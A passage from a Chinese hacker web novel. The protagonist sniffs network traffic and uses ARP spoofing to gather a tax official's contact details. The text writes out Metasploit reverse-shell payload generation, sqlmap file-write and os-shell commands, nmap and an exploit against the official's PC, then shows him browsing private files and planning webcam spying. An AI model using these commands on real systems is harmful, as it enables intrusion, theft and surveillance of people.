嗅探,是個很古老的技術,要知道在以太網中,所有的通訊都是廣播的,也就是說通常在同一個網段的所有網絡接口都可以訪問在物理媒體上傳輸的所有數據,而每一個網絡接口都有一個唯一的硬體地址,這個硬體地址也就是網卡的mac地址,大多數系統使用48比特的地址,這個地址用來表示網絡中的每一個設備,一般來說每一塊網卡上的mac地址都是不同的,每個網卡廠家得到一段地址,然後用這段地址分配給其生產的每個網卡一個地址。在硬體地址和ip地址間使用arp和rarp協議進行相互轉換。
正常狀態下,網卡會根據基於osi模型的tcp/ip協議,接受和發送只和自己mac或者是ip相關的數據,可一旦網卡處在了另一種混雜模式的時候,它會接受任何一個經過它的廣播數據包,如果在加上arp網關欺騙,那麼捕獲到的數據將是整個交換機下主機的通信數據,根據網絡傳輸協議的編碼原則,這些數據在沒有加密的情況下,是很容易進行分析的,而且數據報文也是明碼顯示的。
腦中想著嗅探的原理,淼風在網管李志的注視目光中,再次坐在了19號機前。
打開自己臨時註冊的郵箱,看到附件大小不定的十幾封郵件,淼風握了握雙手,嘴角一動,開始分析數據。
時間悄然流失,淼風抽著煙,靠在椅子上,滾動著鼠標,半眯著眼睛查看著一封封凌亂的數據郵件,同時腦中同步進行著數據分析。
十幾分鐘後,淼風坐直了身子,伸出被他放進口袋取暖的左手,開始敲打鍵盤。
新建的txt文檔中,涉及地稅局副局長陳昇的信息被羅列了出來。
陳昇,地稅局副局長,1月14日晚上九點將參加由市局統籌安排的領導見面會,秘書姓名:宋雲。
手機號碼:130xxxx9987,內線座機8971,辦公電腦ip:10.3.3.97。
看著從龐大嗅探數據中捕獲的簡簡訊息,淼風吐了口氣,再次安裝了虛擬機,並加載了自己的linux_live_cd,啟動sqlmap,用昨晚相同的方式進入了地稅局web服務器。
啟動metasploit,payload_windows/meterpreter/reverse_tcp_lhost=星空網吧外網ip_lport=443_r_|_msfencode–b_–t_exe_–o_root/desktop/fox.exe生成反彈鏈接後門。
ifconfig查看了一下本地鏈接ip網關地址,瀏覽器打開網關,看到tp標識的時候,淼風點了點頭,直接通過幾年後tp的路由web後門將本機內網ip設置成了dmz主機(將內網主機所有埠全部映射到外網)。
sqlmap.py_-u_"dishuijuguanfangwebzhurudian"--file-write_"/root/desktop/fox.exe"--file-dest_"c:/windows/temp/fox.exe"_-v_1將反彈後門寫入地稅局官網web服務器的windows下的temp目錄,文件名為fox.exe
sqlmap添加--os-shell,通過shell執行fox.exe,幾秒中之後metasploit顯示成功,反彈回一個meterpreter的shell。
namp_10.3.3.97,返回埠開發情況135,448,139……,隨便從metasploit中找了一windows的exploit,對10.3.3.97溢出!getshell成功!
陳昇主機被拿下!羅列了一下主機的硬體信息後,讓淼風發現了一個有意思的東西,陳昇的主機裝著耳麥和攝像頭!「這下我可以看一下你工作的時候都在幹什麼了!不過不急,讓我看看你的電腦上都放著什麼東西。」
吐了口氣,淼風開始羅列陳昇電腦上的文件,計劃書丟棄,工作安排丟棄,「這個是……」看著以「重要文件」命名的文件中顯示的三百多個以avi後綴名的文件,淼風眉頭動了一下。調用本地視頻播放軟體打開之後,一個穿著三點的半裸女人出
